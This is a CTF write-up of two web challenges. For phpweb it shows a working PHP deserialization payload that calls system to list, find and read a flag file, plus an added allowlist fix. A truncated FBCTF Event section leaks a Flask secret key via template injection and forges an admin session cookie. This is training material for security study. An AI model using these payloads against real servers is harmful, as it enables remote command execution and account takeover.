BUUCTF(31)

[网鼎杯 2020 朱雀组]phpweb

The page refreshes itself every few seconds, so we start by capturing the request it sends.

It carries two POST parameters:

func=date&p=Y-m-d+h%3Ai%3As+a

We guess that command execution might be possible, but a direct ls does not work, so some functions are probably filtered.

We try reading index.php instead:

func=file_get_contents&p=index.php

This works and returns the source:

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];


    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

The functions we want are filtered, so that route is closed. One thing worth noting after reading the source: only the func parameter is checked against the blacklist, and p is passed through untouched. Looking further down at the Test class, its __destruct method calls gettime with whatever func and p the object holds. So the idea is to build a Test object with modified contents, serialize it, and hand it to unserialize (which is not in the blacklist) so that it is turned back into an object and destructed on the server.

The exp is as follows:

<?php
class Test {
    var $p = "ls /";
    var $func = "system";
}
$a = new Test();
echo serialize($a);
// O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
?>

Pass the parameters:

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

No flag is found there.

Change the serialized variable to:

find / -name flag*
//O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

This finds the location:

/tmp/flagoefiu4r93

The output can be fairly large, so it may take a moment before it appears.

Continue constructing the payload in the same way:

<?php
class Test {
    var $p = "cat /tmp/flagoefiu4r93";
    var $func = "system";
}
$a = new Test();
echo serialize($a);
?>

and the flag is returned:

flag{d32ad185-4190-41eb-8d50-73f03c32e30a}
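The phpweb source above fails because it blacklists function names: unserialize is not on the list, so call_user_func reaches it and the Test::__destruct gadget does the rest. The following is an added example, not code from the writeup or from the challenge, showing the hardened form a defender would want: an allowlist that maps the few accepted func values to known-safe callables, so an unexpected name is refused before any dynamic call happens. The function name gettime_safe and the format-string pattern are my own choices.

```php
<?php
// Added example (not part of the original writeup or the challenge source).
// Hardened version of the phpweb handler: dispatch only to an explicit
// allowlist of known-safe callables instead of blacklisting dangerous names.

$allowed_funcs = array(
    // The only legitimate use of func= on the page is date formatting.
    'date' => function ($p) {
        // Restrict the format string to format letters and plain separators
        // (pattern chosen for this example).
        if (!preg_match('/^[A-Za-z0-9 :\/\-\.+]{1,64}$/', $p)) {
            return "";
        }
        return date($p);
    },
);

function gettime_safe($func, $p) {
    global $allowed_funcs;
    $func = strtolower((string)$func);
    if (!array_key_exists($func, $allowed_funcs)) {
        // Unknown function name: log it for detection and refuse.
        // Never fall back to call_user_func on attacker-chosen names.
        error_log("phpweb: rejected func=" . $func);
        return "";
    }
    $result = call_user_func($allowed_funcs[$func], (string)$p);
    return is_string($result) ? $result : "";
}

// The page's legitimate request still works:
echo gettime_safe("date", "Y-m-d h:i:s a"), "\n";

// The unserialize payload from the writeup is rejected (empty output),
// and so is any other name that is not in the allowlist:
echo gettime_safe("unserialize",
    'O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}'), "\n";
echo gettime_safe("file_get_contents", "index.php"), "\n";
```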

[FBCTF2019]Event

Then we try without the {{}} wrapper, which does not work either:

event_name=1&event_address=1&event_important=__class__

This does return something.

Next we look up the app configuration: __class__.__init__.__globals__[app].config

from flask import Flask
from flask.sessions import SecureCookieSessionInterface


app = Flask(__name__)
# secret key leaked from app.config via the payload above
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'


# the same itsdangerous serializer Flask uses to sign session cookies
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)


@app.route('/')
def index():
    # sign the payload with the leaked key, producing a valid session cookie
    print(session_serializer.dumps("admin"))


index()